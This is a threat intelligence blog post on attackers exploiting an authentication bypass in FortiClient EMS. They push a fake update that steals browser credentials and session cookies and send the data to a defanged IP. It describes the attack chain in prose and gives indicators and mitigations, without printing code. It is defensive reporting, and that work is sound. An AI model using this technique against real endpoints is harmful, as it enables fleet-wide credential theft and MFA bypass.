← Threat Intelligence
Supply Chain / Credential Security

FortiClient EMS Flaw Exploited to Deploy Credential Stealer Across Managed Endpoints

Matt Lucas  |  May 28, 2026  |  5 min
Detected by CaverLive detection for CVE-2026-35616 in the RedEye Intel Feed →
ATTACKER 83.138.53[.]110 CVE-2026-35616 AUTH BYPASS FortiClient EMS CVE-2026-35616 CVSS 9.1 · Auth Bypass Endpoint Mgmt Server FIX: v7.4.7+ MANAGED ENDPOINT fortitray.exe → cmd.exe FortiEndpoint_Patch.exe MANAGED ENDPOINT PowerShell + Base64 Credential Stealer MANAGED ENDPOINT Browser Creds + Cookies Session Hijack / MFA Bypass MANAGED ENDPOINT ProgramData log drop HTTP POST → C2 EXFIL C2 SERVER 83.138.53[.]110 HTTP POST SUPPLY-CHAIN · FORTICLIENT EMS · CVE-2026-35616
9.1
CVSS Score
CVE in this postCVE-2026-35616Live detections →All RedEye CVEs →
CVE-2026-35616
Vulnerability ID
May 2026
Active Exploitation
TL;DR
  • What: Attackers exploit CVE-2026-35616 (CVSS 9.1, auth bypass) in FortiClient EMS to push a fake Fortinet update — FortiEndpoint_Patch.exe — to every managed endpoint via fortitray.exe and Base64-encoded PowerShell.
  • Impact: Fleet-wide credential theft (browser passwords, session cookies, autofill data) enabling MFA bypass and SSO session hijacking; stolen data exfiltrated to 83.138.53[.]110.
  • Fix / mitigation: Upgrade FortiClient EMS to v7.4.7 or later immediately; hunt for unauthorized Remote Access Profile changes, Base64 PowerShell from fortitray.exe, and connections to 83.138.53[.]110; force password resets and invalidate session tokens.
  • Who's at risk: Any organization running FortiClient EMS below v7.4.7 — a single unpatched EMS server exposes the entire managed endpoint fleet without requiring per-device intrusion.

Threat actors are actively exploiting a critical authentication bypass vulnerability in FortiClient Endpoint Management Server (EMS) to distribute credential-stealing malware across entire managed endpoint fleets. The attack, observed by Arctic Wolf in May 2026, weaponizes trusted endpoint management infrastructure to deliver malicious payloads disguised as legitimate Fortinet updates—turning enterprise security tools into attack vectors.

The exploitation targets CVE-2026-35616, a pre-authentication API access bypass with a CVSS score of 9.1 that leads to privilege escalation. Fortinet patched the vulnerability in FortiClient EMS version 7.4.7 and later, but organizations running unpatched versions face immediate risk of fleet-wide compromise through a single point of failure.

Attack Chain: From Authentication Bypass to Fleet-Wide Compromise

The attack begins with exploitation of the API authentication bypass, allowing threat actors to gain privileged access to the FortiClient EMS without credentials. Once inside, attackers modify system configurations to defer firmware upgrade reminders—buying time to operate undetected. They then alter Remote Access Profile configurations and endpoint policies to inject malicious scripts that execute across all managed devices.

Supply Chain Impact

Once threat actors compromised the EMS infrastructure, every managed endpoint became a potential execution target without requiring separate intrusion paths to each device. This represents a classic supply chain attack where trusted management infrastructure becomes the distribution mechanism for malware.

The execution method is particularly insidious. Attackers leverage 'fortitray.exe,' a legitimate FortiClient executable, to launch a .cmd script file through cmd.exe. This abuse of signed, trusted binaries allows the malicious activity to blend with normal management operations, evading detection by security tools that whitelist legitimate processes.

Technical Execution: PowerShell and Base64 Obfuscation

The .cmd script invokes a Base64-encoded PowerShell command that downloads and executes a malicious payload masquerading as 'FortiEndpoint_Patch.exe.' The PowerShell script handles three critical functions: downloading the payload, executing it on the endpoint, and exfiltrating stolen data to attacker infrastructure at 83.138.53[.]110 via HTTP POST requests.

According to Arctic Wolf, the execution pattern suggests threat actors used FortiClient's own management pathways to push malicious PowerShell commands in a manner that closely resembled legitimate management operations. This technique exploits the inherent trust organizations place in their endpoint management systems, making detection significantly more challenging.

Credential Stealer Capabilities and Data Targets

The payload, FortiEndpoint_Patch.exe, is a previously unreported Windows information stealer with comprehensive data harvesting capabilities. The malware targets both Chromium-based browsers (Chrome, Edge, Brave) and Gecko-based browsers (Firefox), extracting sensitive information including:

The stealer writes captured data to log files stored in the ProgramData directory. Notably, the malware itself lacks built-in network exfiltration capabilities—instead relying on the PowerShell script component to transmit stolen data to attacker-controlled infrastructure. This modular approach may be designed to evade endpoint detection and response (EDR) solutions that monitor for network activity from suspicious executables.

Post-Compromise Risk: Session Hijacking and MFA Bypass

Critical Secondary Risk

Session cookies and saved browser credentials provide threat actors with follow-on access to cloud services, internal applications, and authenticated resources. In cases where session reuse is possible, attackers may circumvent MFA prompts entirely, gaining persistent access to critical systems.

The theft of session cookies presents a particularly severe risk for organizations relying on multi-factor authentication for security. Valid session tokens allow attackers to impersonate legitimate users without triggering authentication challenges, effectively bypassing MFA protections. This grants access to SaaS applications, cloud infrastructure, and internal systems that store sensitive data or control critical operations.

The scope of potential compromise extends beyond individual credentials. With access to corporate authentication sessions, threat actors can pivot to cloud services, internal applications, and privileged resources. Organizations using single sign-on (SSO) face amplified risk, as compromised SSO sessions may provide access to multiple integrated applications from a single stolen token.

Immediate Actions and Mitigation Measures

Organizations running FortiClient EMS must immediately verify they are operating version 7.4.7 or later. Any organization on earlier versions should treat this as a critical priority upgrade. During the patching window, security teams should implement compensating controls including network segmentation to limit EMS access and enhanced monitoring of PowerShell execution on endpoints.

Hunt for indicators of compromise by examining FortiClient EMS configuration changes, particularly modifications to Remote Access Profiles and endpoint policies made without authorization. Review endpoint logs for unexpected PowerShell execution, especially Base64-encoded commands launched by fortitray.exe or cmd.exe. Monitor for network connections to 83.138.53[.]110 and inspect the ProgramData directory for suspicious log files.

Force password resets for all users and invalidate existing session tokens, particularly for cloud services and applications accessible via SSO. Implement conditional access policies that require fresh authentication for sensitive operations, even when valid session cookies exist. Review and harden endpoint policies to restrict PowerShell execution where not operationally required, and enable PowerShell logging with script block logging to capture detailed execution data.

Strategic Implications for Endpoint Management Security

This attack demonstrates a fundamental risk in centralized endpoint management architectures: a single vulnerability in management infrastructure creates a force multiplier for attackers. Organizations must treat endpoint management systems as tier-zero assets requiring the same security rigor applied to domain controllers and identity providers.

The use of legitimate executables and management pathways to deliver malware highlights the limitations of traditional security approaches that rely on file reputation and process whitelisting. Security teams need behavioral analytics capable of detecting anomalous management operations, even when executed through trusted tools. The ability of attackers to disguise malicious activity as legitimate updates underscores the need for verification mechanisms that confirm the authenticity of management commands before execution.

As endpoint management systems become increasingly critical to security operations—used for patch deployment, configuration management, and security tool orchestration—they simultaneously become high-value targets. Organizations should implement defense-in-depth strategies that assume compromise of management infrastructure, including network segmentation, privileged access management for administrative functions, and independent monitoring systems that can detect malicious activity even when management tools are weaponized against the organization.

Questions about your exposure?

RedEye Security provides assessments for organizations that need to understand their real risk.

Talk to us

Related coverage

Supply ChainGlassWorm Malware Takedown: Multi-Channel C2 Infrastructure Neutralized in Coordinated OperationSupply ChainMalicious npm Package Targets Claude AI User Directory in Supply Chain AttackSupply ChainMalicious NuGet and npm Packages Target Banking Credentials and Cloud Secrets in Coordinated Supply Chain Attack

Defend against this

RedEye builds the detection. Caver runs it. The feed ships it to your SIEM.

Managed Detection & Response →Caver SIEM →Live detection feed →